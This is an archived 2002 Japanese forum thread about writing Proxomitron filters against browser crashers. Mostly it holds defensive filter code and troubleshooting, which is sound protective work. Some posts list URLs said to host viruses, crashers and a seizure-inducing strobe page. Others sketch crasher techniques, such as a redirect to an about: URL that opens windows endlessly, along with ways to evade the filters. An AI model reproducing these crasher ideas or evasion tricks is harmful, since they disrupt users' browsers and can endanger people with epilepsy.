ブラクラにProxomitronで対抗するスレPart3
スト伊湖ヴィっ地
マンモス東
アメー!
9 :
ひみつの文字列さん :2024/12/22(日) 20:28:29 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
11 :
織部箸にました ◆RqJLqvX. :02/09/13 03:09 ID:OTtDge1g
/ ̄ ̄ ̄ ̄ ̄ ミ / ,――――-ミ / / \ / | | / ,(・) (・) | (6 つ | | ___ | / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | /__/ / < 新スレおめでとうございます /| /\ \__________ トテテテテテ
14 :
名無しさん@お腹いっぱい。 :02/09/13 16:47 ID:fCJk8NZT
//dms100.org/worksucks (ウイルス:ホモ&ブラクラ&ウイルス) //raus.de/crashme/ (ウイルス:ブラクラ&ウイルス) //jbbs.shitaraba.com/computer/1348/ (ブラクラ:メーラーが無限起動します) //dildo-drive.porncity.net/122/ugmovie[01-06].ram (ウィルス:ウィルス+EXEダウソ) //dempa.2ch.net/prj/page/heisa/news5.html (「殺人兵器」。赤と青が連続的に発色するサイト。 てんかんの引き金になる。) //sakashita.strangeworld.org/source/up0768.jpg (ブラクラ:メーラーが無限起動します) これ勇気スレのテンプレなんですが、強いブラクラありますか?
>>16 中身見れ。仕組み同じだ。
オミトロン使っててこんな単純な奴に引っかかるっていうのは結構恥ずかしいと思うぞ。
>>17 >強いブラクラ
ない。全部ガイシュツかつ普通に防げる。
21 :
名無しさん@お腹いっぱい。 :02/09/14 09:09 ID:9yab/6sQ
3連休初日ネトラン厨歓迎age
22 :
名無しさん@お腹いっぱい。 :02/09/14 19:03 ID:M3gehKDv
ネトラン者ぶっこ抜きage
23 :
てすた :02/09/14 22:34 ID:???
____ /∵∴∵∴\ /∵∴∵∴∵∴\ /∵∴∴,(・)(・)∴| |∵∵/ ○ \| |∵ / 三 | 三 | / ̄ ̄ ̄ ̄ |∵ | __|__ | < うるせー馬鹿! \| \_/ / \____ \____/
さあ、使い方教えれ
안녕하세요
26 :
名無しさん@お腹いっぱい。 :02/09/15 08:48 ID:d3O7orTe
_ , ― 、 ,−' `  ̄ヽ_ ,' ヽ ( ) ( ノ`ー'ー'ヽ ) ( ノ● ●( ) ( 〉 -――-( )_ _ `ー'l ● ( ノ ヽ ) 、‘ー'ー’ _ノ`ー' |  ̄| ̄ | / /7 / ̄ ̄/ / `ー´ `ー ´ `―´
(゚Д゚)ハァ?
Name = "Tsukaeru Killer" Active = TRUE Limit = 2000 Match = "(<!--TSUKAERU CODE START-->*<!--TSUKAERU CODE END: Thankyou-->)|" Replace = "<!-- (・∀・)イイ! -->"
Name = "Tsukaeru Killer" Active = TRUE Limit = 2000 Match = "(<!--TSUKAERU CODE START-->*<!--TSUKAERU CODE END: Thankyou-->)" Replace = "<!-- (・∀・)イイ! -->" 訂正
35 :
(・μ・) :02/09/16 12:01 ID:nGl0rKK+
Name = "AAACAFE Killer" Active = TRUE Limit = 2000 Match ="(<!-- AAACAFE banner tag -->*<!-- AAACAFE banner tag -->)" Replace = "<!-- (・∀・)イイ! -->"
スマソ、勘違い
ぅぉ・・ 37=35ね。
>>33-35 おまいはホントにそんなフィルタ使ってるんかと。
ブロックリスト作るだろ、普通は。
>>39 Encoded Script Killer2で防げた。
Name = "Encoded Script Killer2"
Active = TRUE
Limit = 15
Match = "JScript.Encode"
Replace = "JScript.Killed"
>>41 Matchを以下に修正して下さい。コピペミスしたらしい…。
Match = "JScript.Encode"
>>42 は無視して下さい。連続スマソ…コピペミスじゃなく、フィルターがマッチ
していただけだった…。
44 :
39 :02/09/16 16:21 ID:???
>>41 ありがと、防げた。
俺も追加したあとそれ見て、
あれ?MatchとReplaceが同じじゃ意味無いような、と思ってしまった。
45 :
名無しさん@お腹いっぱい。 :02/09/16 17:33 ID:n3jOwD46
46 :
名無しさん@お腹いっぱい。 :02/09/16 20:16 ID:BuZqgVzp
47 :
名無しさん@お腹いっぱい。 :02/09/16 20:18 ID:qlGl9JnL
>>46 防げました。
Kill Unexpected Protocols (2002/05/15)
Kill Specific JavaScripts (2002/05/12)
>>49 もう一度tocさんのフィルターを入れ直してみては?
>>49 良く分からんけど,前スレ781とか関係あるんじゃない?
>>51 Content-Lengthの話でしたっけ?<前スレ781>
もし、そうならContent-Length: always filterのMatchの数値を弄れば解決で
すね。
53 :
名無しさん@お腹いっぱい。 :02/09/17 02:26 ID:jIiHN9bS
見られん
[Unexpected Protocol Found]がイパーイ
すいません。教えて下さい。 Proxomitronを多段で使うには、やはり別のソフトが必要なんでしょうか? やりたいのは インターネット<プロバイダのプロキシ<Proxomitron<ブラウジング みたいなことです。 Proxomitronの設定をイロイロ見てみたんですが、アクセスする回線の指定 みたいなものを見つけだすことができませんでした。 そこに「プロバイダのプロキシ」を指定してやると、いけそうかな?と思っていたのですが。
57 :
55 :02/09/17 13:14 ID:???
すいませんでした。 教えていただいたスレッドに行きます。
58 :
名無しさん@お腹いっぱい。 :02/09/17 15:26 ID:1PRvKuXe
多段するぐらいならネトカフェ行けよ どうせくだらんことするか、ネトラン厨なんだろ? どっちにしろ誉められるような行為しないことは確かだからな
Age2ch 0.03.28
http://wkms01.hoops.ne.jp/files/2002091715300636.zip - 概要
2ちゃんねる更新チェック&保守ツール
お気に入りの2ちゃんねるのスレッドのURLを登録することで、
そのスレッドが更新されたときに通知したり、そのスレッドに
何日か書き込みがなかった場合に自動的に保守をすることができます。
タブブラウザと連動させるには、
オプション→全般タブ→他のアプリケーションで開くで指定してください。
ソースもついてますので、自由に変更してください。
- 以前のバージョンとに違い
タスクトレイのポップアップメニューにオプションの一部を追加しました。
タスクトレイを左クリックしたときの標準動作を切り替えられるようにしました。
更新通知でタスクトレイアイコンが変更されるタイミングを変更しました。
>59 アクセスできません
Age2ch 0.03.28
http://skycgi.zero.ad.jp/~zbm78265/up/u_file120020917165440.zip - 概要
2ちゃんねる更新チェック&保守ツール
お気に入りの2ちゃんねるのスレッドのURLを登録することで、
そのスレッドが更新されたときに通知したり、そのスレッドに
何日か書き込みがなかった場合に自動的に保守をすることができます。
かちゅ〜しゃ、Jane、タブブラウザ等と連動させるには、
オプション→全般タブ→他のアプリケーションで開くで指定してください。
ソースもついてますので、自由に変更してください。
- 以前のバージョンとに違い
タスクトレイのポップアップメニューにオプションの一部を追加しました。
タスクトレイを左クリックしたときの標準動作を切り替えられるようにしました。
更新通知でタスクトレイアイコンが変更されるタイミングを変更しました。
62 :
名無しさん@お腹いっぱい。 :02/09/17 20:03 ID:Ikdai6l8
Age2ch 0.03.29
http://skycgi.zero.ad.jp/~zbm78265/up/u_file120020918011629.zip - 概要
2ちゃんねる更新チェック&保守ツール
お気に入りの2ちゃんねるのスレッドのURLを登録することで、
そのスレッドが更新されたときに通知したり、そのスレッドに
何日か書き込みがなかった場合に自動的に保守をすることができます。
かちゅ〜しゃ、Jane、タブブラウザ等と連動させるには、
オプション→全般タブ→他のアプリケーションで開く、で指定してください。
ソースもついてますので、自由に変更してください。
- 以前のバージョンとに違い
ツールバーを使うようにしました。
インターネットショートカットをD&Dでインポートできるようにしました。
メインメニューに「更新された項目を開く」を追加しました。
タスクトレイのメニューにオプションの一部を追加しました。
初心者スレがないのですみません。 リンクを[Ad]として残しておくにはどうすればいいのでしょうか? リンクしてるのと死んでるのがあるのですが…
67 :
名無しさん@お腹いっぱい。 :02/09/18 20:40 ID:CVczZOgy
68 :
名無しさん@お腹いっぱい。 :02/09/19 13:34 ID:FdqxGFJ1
ソフトウェア版のほうは盛り上がらないね。。
71 :
名無しさん@お腹いっぱい。 :02/09/20 20:11 ID:LTeWKFEs
あげ
あのさ、toc氏のフィルタだけで防げるようなブラクラはもう貼らないでおこうよ…
たしかにもう秋田。なんかすげーのこないかな・・・。
ていうかブラクラを作るスレですか?
俺が知ってるかぎり、toc氏のフィルタで防げないのは ・.swf利用 ・漢字コードを利用してBoundsを誤魔化す ・Limitオーバー ・文字参照+改行文字 ・URIを扱うCSS宣言とプロパティ ・CSSのバックスラッシュによるエスケープ ・各種実行Script これらには、何かしら対応の甘い部分があるはず。 それぞれ解決方法は過去スレ見てればわかるけど。
78 :
名無しさん@お腹いっぱい。 :02/09/22 19:53 ID:r9sjqWiB
>>77 だけどそんなブラクラに出会うことはないよ。
よっぽどアングラなとこと行かない限りね。
このスレが一番危険な気がする。
危険か? 漏れが思いつくブラクラは誰か他の人も思いつくだろうし、 漏れはやらんけどその人が悪意を持っていないとも限らないし、 でもフィルタ考えるのは面倒だし抜けがあるのもイヤなので皆で考えようぜ という趣旨のスレなのだと思ってたのだが。 予防注射みたいなもの。 そろそろ出尽くした観はあるし、ブラクラもフィルタもそのものを張る人は減ったけど。
誰かがブラクラ作る → 誰かが対策フィルター作る・対策方法を考える → その抜けを突いたブラクラを・・・ → 更に対策を こうなればいいね。 既出のブラクラを貼るスレはまた別に ブラクラコレクションスレとか用意してもいいのかも 人居ないし、ここで十分かもしれんが。
でも文字コード使ってマッチさせないっていうのは、対処しようとしたらキリが無いような・・・。
Name = "aaa" Active = TRUE Limit = 32767 Match = "" "<html" Replace = "<h2>" "not found" "</h2>" "<comment>" "<script>" "<layer>" "<!-- " これで恐れることはないです
>>82 漏れが使ってるフィルタの原形をうpろだに置こうか?
別の問題ありそうだから公開してなかったんだけど。
85 :
名無しさん@お腹いっぱい。 :02/09/23 19:57 ID:/YML/Xj8
ヒミツ
87 :
名無しさん@お腹いっぱい。 :02/09/24 15:52 ID:wvwDvt8B
オマエガナ
89 :
:02/09/24 16:24 ID:???
オレノコトカ?
>83 これの使い方を教えて下さいませ。
92 :
名無しさん@お腹いっぱい。 :02/09/24 20:23 ID:CjCTlTb3
>>91 使い方はわkぁるやねせか!!!
効果がわからんのじゃ
93 :
:02/09/24 20:35 ID:715VtNVu
質問です。サポート言語の環境変数を変更する フィルタはあるのですか?
94 :
名無しさん@お腹いっぱい。 :02/09/24 22:11 ID:pB2kdqt3
96 :
名無しさん@お腹いっぱい。 :02/09/25 00:33 ID:ypNZipSK
>83 それじゃなんも見えんだろっ!
【不幸のレス】 このレスを見た人間は十三日以内に死にます。 ※あなたに訪れる死を回避する方法が一つだけあります。 それはこのコピペを一時間以内に7つ、別のスレに貼り付ける事です。
>>97 じゃあ一つのスレに7つ貼り付けてもいいのかと小一時間問いつめたい。
んじゃ見たやつ7つずつ貼り付けていく? 荒らしとみなされたら「命がかかってました」って言っておけばいいんじゃない?
>>99 じゃあ厨房版あたりに専用スレを(r
ついでに100ゲット
当スレは、win板上記スレへ併合のため廃止されました 今までご愛用ありがとうございました ------------------------終了------------------------------------
------------------------初心者さんどうぞ再開------------------------------------
んー、盛り下がるのも仕方ないな。 ウィルス作者と比べてブラクラ作者は鬼才が少ない? 求む、ブラクラ作者。 あっ、TOCさん自ら作ってみるとか(w
対*.swfブラクラ用フィルタを作ってみたけど、肝心のswfブラクラが見つからない。 場所わかる人だれか試してみて・・・ [HTTP headers] In = TRUE Out = FALSE Key = "Content-Type: shockwave-flash check (in)" Match = "(application/x-shockwave-flash |$URL([^\?]++.swf(\?*|(^?))))&$LOCK()(^$CONFIRM(Allow the URI "\u"))" Replace = "\k" In = FALSE Out = TRUE Key = "If-Modified-Since: unconditional GET *.swf (out)" URL = "[^\?]++.swf(\?*|(^?))" Match = "*" In = FALSE Out = TRUE Key = "If-None-Match: unconditional GET *.swf (out)" URL = "[^\?]++.swf(\?*|(^?))" Match = "*" unconditional GET *.swf (out)は、まぁ気休めで。 HTTPステータスコード書き換えられないのはいまのところ致命的じゃないけど、出来たほうがいいよなぁ。 さて、次は文字コード。 エスケープシーケンスもなしで<>が多バイト文字の一部として出てくる文字コードってないよね?
>>107 それブラクラじゃなくて、たんなるグロ。
109 :
名無しさん@お腹いっぱい。 :02/09/26 22:21 ID:1rvUEHj9
>>105 あんまし役にたつ機会ないけど
まぁ一応さんきゅとだけは言っておく
文字コード対策は、対ブラクラ用のウェブページフィルタを全面的に書き換える必要があることが分かった。 Escape Quoted Meta Charactersの書き換えだけで済むかと思ってたけど、そういうわけにもいかないらしい。 メンドクセェ。というわけで今日は寝ます。おやすみなさい。
111 :
:02/09/28 00:23 ID:???
Age2ch 0.03.30
http://ruffnex.oc.to/ipusiron/upload/1439.lzh - 概要
2ちゃんねる更新チェック&保守ツール
お気に入りの2ちゃんねるのスレッドのURLを登録することで、
そのスレッドが更新されたときに通知したり、そのスレッドに
何日か書き込みがなかった場合に自動的に保守をすることができます。
かちゅ〜しゃ、Jane、タブブラウザ等と連動させるには、
オプション→全般タブ→他のアプリケーションで開く、で指定してください。
ソースもついてますので、自由に変更してください。
- 以前のバージョンとの違い
こまかい調整のみです。
113 :
112 :02/09/28 01:07 ID:???
追記。制作・確認はNaoko4.3+窓用Opera6.05でやってます。 List自体はどのブラウザでも書き換える必要はないと思いますけど、一応念のため。
116 :
名無しさん@お腹いっぱい。 :02/09/28 19:17 ID:Ca5sVi+R
LimitオーバーはLimitの値増やせばいいとして・・・ 文字参照+改行文字は、例えばコロンが有ることでmailto:等のschemeがあると判断する場合、 文字参照のことを考えて(:|\(x[0]+3a(;|(^[0-9a-f]))|[0]+58(;|(^[0-9]))))とする。 Operaの場合、クォートで囲むと改行文字を無視されるから更に (:|\&[\t\r\n]+#([\t\r\n]+x[0\t\r\n]+3[\t\r\n]+a[\t\r\n]+(;|(^[0-9a-f]))|[0\t\r\n]+5[\t\r\n]+8[\t\r\n]+(;|(^[0-9])))) としなければいけない、と。
あ、化けた。 (:|\&#(x[0]+3a(;|(^[0-9a-f]))|[0]+58(;|(^[0-9])))) #を全角で書いてみる。
Age2ch 0.3.32
http://ruffnex.oc.to/ipusiron/upload/1448.lzh - 概要
2ちゃんねる更新チェック&保守ツール
お気に入りの2ちゃんねるのスレッドのURLを登録することで、
そのスレッドが更新されたときに通知したり、そのスレッドに
何日か書き込みがなかった場合に自動的に保守をすることができます。
かちゅ〜しゃ、Jane、タブブラウザ等と連動させるには、
オプション→全般タブ→他のアプリケーションで開く、で指定してください。
ソースもついてますので、自由に変更してください。
ふと思い浮かんだんだけど、ステータス303で about:<script>window.open(location.href)</script> に飛ばすってのはがいしゅつ? 鯖持ってないんで試してないんだけど。
123 :
◆VXf.Nbxl/6 :02/10/04 07:03 ID:24/rxS41
^^
>>122 初かも。でもまぁソレはLocation: (in)で対応できるからいいとして。
漏れもふと気付いたのだが、フラッシュでgetURL("javaScript:〜");ってヤラれた場合
ブラウザでスクリプト切っとかないと実行されるんですが。
これはオミトロンにはどうしようもないなぁ。
やはりスクリプト対策はオミトロンを過信せんほうがいいね。
>>124 そんな手の込んだブラクラにかかる機会あります?
せいぜいガタガタかメール窓プワププワぐらいだしなぁ・・・
そのswfを一応見てみたい getURLのサンプルキボン
128 :
名無しさん@お腹いっぱい。 :02/10/07 15:43 ID:PJXQ2BS3
Naoko-4.4あげ。
129 :
名無しさん@お腹いっぱい。 :02/10/07 15:49 ID:GiLBX5KB
132 :
:02/10/07 16:01 ID:???
133 :
名無しさん@お腹いっぱい。 :02/10/07 22:21 ID:fKsnZ684
>>131 ・・・。
ソフトウェア板のスレはもう終わりですか?
4.4にUPしてから Content-Length: always filter (In)が本物のGIF画像などに適用された場合、 Protect Contents except Text (2002/05/02)が 無限ループするようになったのですが、良い対策はないですか?
136 :
134 :02/10/07 23:17 ID:???
ありがと!なおりました。
tocさん更新期待あげ
>>138 >>137 じゃないが、あんたが煩わすだうんぬん偉そうに言うこたぁない。
本当に必要なとき、っておまえの基準なんか知らねぇよ。
確かにえらそうだったスマソ でもtoc氏が更新してないからには自分らで変えなきゃならん。 過去ログ読むなり書き換えるなりしてさ。 それができるうちは光臨期待上げよりも建設的になろうぜ ってこといいたかったんだ… そもそも137を440と同一人物と思い込んだのがおかしいんだな、すまん
141 :
名無しさん@お腹いっぱい。 :02/10/08 16:48 ID:Bj12vet2
>>139 あなたももうちょっと優しい言い方で。
tocさん期待age
久しぶりに見てみたらなんとYukari4.4が出てるじゃん! 設定はそのまま引き継いでProtect Contentsの無限ループの対処は完了。 今の所他のフィルターは問題なく動いているようだ・・・
という事でこれから4.4用ストイコ・ヴィッチフィルターを作る予定。
>>140 向こうの440(≠ここの137)です。
読んだか?と聞く前に試してみて欲しかったです。
向こうで出したURLのは少なくともLimit最大にしても解決しません。
記述不足と最後の一文が余計だったことは認めます。
一応自作フィルタ(XOOMのフレーム消しとかの大昔だけど)や
Thread Table Reformerの手直し(のヒント)とかを書き込んだ
ことはありますが、どうも今回は上手く手直しできない・・・。
>>144 向こうの410です。
Limit = 30000は256ぐらいでいいです。
自分の環境ではProtect Contents except Text大丈夫です。
スマソ、Limit 最大にしたらうちでは画像の壊れはなかったもんで 詰め込みすぎてるのならブラッシュアップとかいいかも
147 :
名無しさん@お腹いっぱい。 :02/10/09 01:10 ID:Khvoyhsm
直リンクが禁止されているページについて、 リファラを見ていると思うのですが考えたのが その一つ前のページから来たように見せかけるために リファラoutの所を URL 見たいページ マッチするもの * 置き換え 見たいページの一つ前 としてみたのですが、どうもうまくいきません。 そんなに詳しくないのですがどうしたらいいでしょうか。 他にも、ページのある部分(<BR>等)を別の言葉に置き換える というのもやってみたのですが www.yahoo.co.jp をURLにセットして、文中の「ヤフー」という言葉を 「yahoo」に置き換える という設定にしても駄目でした。難しすぎる!
うちではProtect Contents except TextをOFFにしても 画像壊れたんでこれが原因じゃないのかも
>>147 ヤフー→yahooの場合、「ー」がだめ文字でひっかかってると思われ。
$LST(SafeList)がおかしかったので修正↓
Name = "Protect Contents except Text"
Active = TRUE
URL = "^$LST(SafeList)"
Limit = 256
Match = "$IHDR(Content-Type:^text/)(< (!DOC|[a-z])"
"$SET(#=<html>\n"
" <head>\n"
" <title>\n"
" HTML Contents Found\n"
" </title>\n"
" </head>\n"
" <body>\n"
" <h1>\n"
" HTML Contents Found\n"
" </h1>\n"
" <p>\n"
" URL:\n"
" <a href="
http://\xbweb..src..\h\p ">\n"
" \u\n"
" </a>\n"
" </p>\n"
" </body>\n"
"</html>\k)|\#)$STOP()"
Replace = "\@"
>>147 *は*です。
ヤフーはヤフ[%81]\[
にするといいかも。ただ、カタカナは誤ってマッチしやすいです。
画像が壊れるのはフィルタが画像のバイナリに誤マッチしてるからでしょ
Gacktだけ壊れた……
Protect〜以外についてならURL Matchで 画像はmatchしないようにしてもいいんじゃないの?
( ゚д゚)ポカーン
なんか不具合ばっかりみたいなのでアップデートできねーーー
不具合ないんですが
158 :
名無しさん@お腹いっぱい。 :02/10/11 20:43 ID:CUPe6ji0
>156 無限ループは過去ログ&Win板本スレ見ろよぼけ それ以外に具合なし パグ取りなされているぞ最新版は
・・・まだ足りないのか・・・
161 :
名無しさん@お腹いっぱい。 :02/10/13 12:57 ID:p5y0tlDF
IE6SP1がデフォルトでjpgに偽装したブラクラに対応した予感
>>162 いやだから、漏れ105で124でその他省略だけど。
それは105じゃふせげねぇって。
105は.swfからまた.swfを呼ぶことを想定してたから。ユーザは、怪しいと思ったら途中で切れるようにって。
漏れ普段はブラウザでスクリプト切ってるから平気だけど、Onにしたらブラクラ1で無限Window食らった。
さてどうしよう。
.swfの倍直書き換えって大丈夫なのかね?
というかURIって絶対にベタで格納されてるのかね?
なら対抗もなんとか出来るけど。
164 :
162 :02/10/13 18:54 ID:???
>>163 > .swfの倍直書き換えって大丈夫なのかね?
やって見たけど無理っぽい
> というかURIって絶対にベタで格納されてるのかね?
解らないのでflashスレで聞いてみます
とりあえずの応急処置 [HTTP headers] In = TRUE Out = FALSE Key = "Content-Type: shockwave-flash check (in)" Match = "(application/x-shockwave-flash |$URL([^\?]++.swf(\?*|(^?))))&$LOCK()(^$CONFIRM(Allow the URI "\u")$FILTER(true))" Replace = "\k" [Patterns] Name = "kill javascript in shockwave-flash" Active = TRUE URL = "[^\?]++.swf(\?*|(^?))" Limit = 16 Match = "javascript:" Replace = "hogescript:" あと誤爆しそうなフィルタは.swfを除外。 対ブラクラの為にflash勉強するのは馬鹿らしいなぁ。 ということで、手抜きのまま終了の予感。
Name = "Protect Contents except Text (SWF)" Active = TRUE URL = "*.swf" Limit = 256 Match = "src=|href|data|class|ground|import|equiv|style|script" "$SET(#=<html>\n" " <head>\n" " <title>\n" " HTML Contents Found (SWF)\n" " </title>\n" " </head>\n" " <body>\n" " <h1>\n" " HTML Contents Found (SWF)\n" " </h1>\n" " </body>\n" "</html>\k)$STOP()" Replace = "\@"
Name = "Protect Contents except Text" Active = TRUE URL = "^$LST(SafeList)" Limit = 256 Match = "$IHDR(Content-Type:^text/)< (!DOC|[a-z])" "$SET(#=<html>\n" " <head>\n" " <title>\n" " HTML Contents Found\n" " </title>\n" " </head>\n" " <body>\n" " <h1>\n" " HTML Contents Found\n" " </h1>\n" " </body>\n" "</html>\k)$STOP()" Replace = "\@" として、SafeListに*.swf*を付け加えるというのはどうでしょうか。
よく考えるとSafeListに*.swf*は危険かな・・・。
>>166-168 聞いていいか?そのフィルタはどういう場合に役に立つの?
あるいは他のフィルタとの連携を考えてのこと?
スンマソン。
>>167 のProtect Contents except Text
なんかおかしかったです。
>>169 Content-Type: Fix MIME types (In)
Content-Length: always filter (In)
Content-Type: always filter (In)等と連携して
Content-Typeを利用した(悪用した)ブラクラ、を防ぐためのフィルタ
Protect Contents except Text(tocさん作)を自分なりに改造したつもりが
改悪してしまったのです。すみません。
スレ汚しになるかもしれないので今度からアップローダー利用します。
いや別にこのスレに書くなとも言わんしあぷらだに揚げるなとも言わんし、 他人が作ったもの改造するなとも言わん。そんなもん自己責任で適当にやってくれ。 ただフラッシュのブラクラの話をしてるときに166が書き込まれたからどういう意図かわかんなくて聞いてみただけ。 要はフラッシュに関係ないフィルタなのね。URL = "*.swf"ってあるけど。
test
いいから今のところ完璧なフィルターをよこせ
Content-Typeを利用したブラクラねぇ?
漏れIEユーザじゃないからアレだけど、対応するとしたらこんな感じか?
[HTTP headers]
In = TRUE
Out = FALSE
Key = "URL: always filter (in)"
Match = "\0"
Replace = "\0$FILTER(true)"
[Patterns]
Name = "check some html tags at the head portion"
Active = TRUE
URL = "$TYPE(oth)"
Limit = 255
Match = "((*<(html|head|body|img|table|script))\#$SET(\0=<plaintext>)|)"
Replace = "\0\@$STOP()"
LimitはIE4なら255、5以上は200。
text/htmlと解釈するタグの種類はシラネから適当。
他のテキストコンテンツ用のフィルタには$TYPE(htm|css|js|vbs)つけて
無駄なフィルタは実行しない。
>>174 Name = "imanotokoro kanpekina firuta-"
Active = TRUE
Limit = 1
Match = "*"
あら。 $TYPE(htm|css|js|vbs)という表現はダメらしいので、個別に分けるか $TYPE(oth)を反転して下さい。
つまりIEはヘッダ255〜200見てるって事ですか?
178 :
名無しさん@お腹いっぱい。 :02/10/14 22:18 ID:gEwFee+n
自分のパソコンのプロクシはいくつに設定すればいいのですか?
>>178 アド:163.24.21.117
ポート:80
tocさん更新してくれよ、たのむよ、マジで
182 :
179 :02/10/15 00:14 ID:???
>>180 オイ、頼むから真面目に感謝しないでくれ。ネタだよ。
本物
アド:localhost
ポート:8080
>>161 今調べてみたが、確かにデータ偽装対策はできてるようだ。
試しにGIF89aとだけ書いたテキストファイルを読ませてみたが、ちゃんとプレーンテキストで出てくる。
…とはいえ、Content-Typeを無視する仕様にかわりはないようだ。
>>184 SP1まではContent-Type無しのファイルはHTMLと処理されてたのに
SP1からは未知のファイルとして処理されるようになった
少し改善されてきたように思う
頑張れIE・・・っと
個別kill以外は多分_
Freeze GIF Animation
190 :
名無しさん@お腹いっぱい。 :02/10/16 16:48 ID:3Lgz5eWI
レジストリいじるとContent-typeをまともに認識するようになるってホント?
>190 ブラウザの方で切って見たけど無理ですが? これ健康な人でも見るとクラクラくるよね。対策はどうするべ。
Opera6専用ブラクラフィルタ。 [Blocklists] List.MIME-List_O6 = "..\Lists\MIME Fix List for Opera6.txt" [HTTP headers] In = TRUE Out = FALSE Key = "Content-Type: fix MIME types for Opera6 (in)" Match = "$IHDR(Content-Disposition: ((attachment|)[;%20\t])+filename\=[^;]++.$LST(MIME-List_O6)([;%20\t]|(^?)))" Replace = "\0" === Start "..\Lists\MIME Fix List for Opera6.txt" === # # MIME Fix List for Opera6.txt (NoAddURL,NoPreHash) # # txt$SET(\0=text/plain) js$SET(\0=application/x-javascript) html$SET(\0=text/html) htm$SET(\0=text/html) css$SET(\0=text/css) === End "..\Lists\MIME Fix List for Opera6.txt" === NoPreHashは要らないかも。 txtは好みで。ない方が安全側とも言えるがあっても危険はないはず。 Operaは「設定」−「ファイルタイプ」−「MIMEタイプで処理を判断する」をチェックする。 (デフォルトは「信頼できないMIMEタイプ〜」になっているが、これはダメ) 他のブラウザでは無意味か有害。 NNはもともと問題ないけど、IEはアレらしい。 けど症状が違うのでこのフィルタは役に立たないみたい。
修正。 Match = "$IHDR(Content-Disposition: ((attachment|)[;%20\t])+filename\=[^;]++.$LST(MIME-List_O6)([;%20\t]|(^?)))" ↓ Match = "$IHDR(Content-Disposition: ((attachment|)[;%20\t])+filename\=[^;%20\t]++.$LST(MIME-List_O6)([;%20\t]|(^?)))"
195 :
名無しさん@お腹いっぱい。 :02/10/17 12:37 ID:NTKUXnFw
日本語パッチ4.4きたー
196 :
名無しさん@お腹いっぱい。 :02/10/19 00:07 ID:+uIY9wYg
あげるか。
>>191 たしか本当だったと思うが、、、URL忘れちゃった
Kill Unexpected Protocolsで画像が壊れる。 もう どうでも こうでも ブルドック
>>193 >Operaは「設定」−「ファイルタイプ」−「MIMEタイプで処理を判断する」をチェックする。
(デフォルトは「信頼できないMIMEタイプ〜」になっているが、これはダメ)
デフォルトの設定はオミトロン使っていなくてもダメなの?
200 :
名無しさん@お腹いっぱい。 :02/10/19 15:04 ID:wE81X6Av
>>198 キシュツ中のキシュツのキシュツ。
過去ログ読め読め読め読め読め読め読め読め読め
まじで
うざい
201 :
名無しさん@お腹いっぱい。 :02/10/19 15:28 ID:QA8i4v7Q
画像が壊れる問題はいつ解決したんだ? win板もこのスレも最終的な結論にはたどり着いてないようだが
(゚ε゚)キニシナイ!!
気ーになっちゃう♪気になっちゃう♪
>>203 Image Checker Afterは?
209 :
203 :02/10/20 00:29 ID:???
>>208 過去ログ検索して、154さんの方法を試したら何とか解決できました。
わざわざお手数をお掛けして申し訳ありませんでした。
そりゃそうだろ
154の方法でちゃんとブラクラも防げるの? 拡張子jpgのブラクラがKill Unexpected Protocolsとかで 防いでた部分を含んでたらマズかったりしないの?
214 :
名無しさん@お腹いっぱい。 :02/10/20 18:44 ID:2vjP2IJl
<font style="font-size:999pt"><a href="iecrash.html">ENTER</a></font> みたいなのに対抗するフィルタください。どこかで見たんだけどなぁ・・・・・。 今、探しても見つからない・・鬱
なんで拡張子で判断するんだ?
Operaデフォルト設定で使ってるのかおまいらは。
IEは中身の先頭で判断するし、NNやProxomitronはMIMEで処理を分ける。
jpg云々は、MIMEがimage/*だからProxomitronはウェブフィルタを適用しないけど
IEはファイルの内容で処理を判断する、そこにhtmlタグが見付かったりすると
htmlとして表示するから、ブラクラに成り得るんだろ?
でもイメージとか、すべてのファイルにブラクラチェックかけてると遅くなるから
Protect Contents except TextとかImage Checkerとか
>>175 とかは、
通常htmlと判断しないファイルに関して、IEがhtmlと認識するタグを見つけたら
ブラクラであろうがなかろうが殺すってことをやってんじゃないの?
あるファイルに関して、これらとテキストコンテンツ用ブラクラフィルタは
どっちか一方が適用されてればとりあえずは問題ねぇよ。
素直に分けるなら、$TYPE(oth)と(^$TYPE(oth))だろうね。
216 :
203 :02/10/20 19:27 ID:???
>>212 一応テスト用のブラクラで試したけど大丈夫だったよ
218 :
名無しさん@お腹いっぱい。 :02/10/20 23:31 ID:4ROEQcl/
すいません。初心者なんですが、 現在みなさんが入れているフィルターを まとめてどこかにUPして頂けませんか? 「これだけ入れておけば現状は最高」 という状態のがいいです。
>>218 「初心者なんですが」はやめたほうがいいかと。
誰も相手にしないだけ。
誰もが始めは初心者だったけど解説ページ読みながら学んでるんだよ。
>>218 最高は人それぞれだしなぁ
あまりごたごた付けすぎると通信速度が落ちるとか聞いたし
色んなサイトを巡って自分が必要だと思ったモノだけを付けた方がイイと思う
どうせ君のレスを見てフィルターのセットを上げてくれる人なんか居ないだろうし
悪意の無いJavaScriptを無限ループにしたり、imgタグをFDDやcon/conにリンクさせるフィルタをうpしようと思った漏れは悪人でしょうか
知障
>>221 JavaScriptを無限ループにしたり、imgタグをFDDやcon/conにリンクさせるフィルタです。
とか、
このフィルタの使用に際し、いかなる損害も作者は責任を負いません。
と書いておけば何の問題もない。
224 :
:02/10/21 11:25 ID:???
はじめまちて。これ使って可能な限り文字装飾と背景指定無効にしてテキストブラウザっぽく 使っている人いますか?
225 :
:02/10/21 11:34 ID:QM8/nqU/
あげさせて
toc更新しやがれ!
>>224 インターネットオプションで簡単に出来るよ。
>227 うぅ出来やした。。こんな簡単な事で何日も悩んでました。ありがとうございます。
229 :
名無しさん@お腹いっぱい。 :02/10/22 17:15 ID:CHKlPNUA
230 :
229 :02/10/22 17:18 ID:CHKlPNUA
ていうか自分はアナログなので フィルターつけまくって無駄なフィルター多いんだろうが ぜんぜんオミトロン刺しても刺さなくても違いがわからんが。
231 :
名無しさん@お腹いっぱい。 :02/10/23 08:39 ID:xnW5JOMg
